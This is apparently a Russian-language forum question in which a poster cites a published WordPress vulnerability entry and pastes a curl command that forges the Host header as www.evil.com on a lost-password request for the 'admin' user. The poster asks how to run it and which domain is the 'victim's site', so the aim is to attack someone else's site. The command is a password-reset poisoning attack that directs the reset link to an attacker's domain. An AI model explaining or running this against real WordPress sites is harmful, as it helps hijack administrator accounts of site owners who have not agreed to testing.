Всем привет.

Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:

https://wpvulndb.com/vulnerabilities/8807

я так понимаю, что это：

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Команда для терминала в линукс?

Что должно быть вместо evil.com ?

вместо example.com сайт жертвы?

или наоборот?

Разъясните пожалуйста.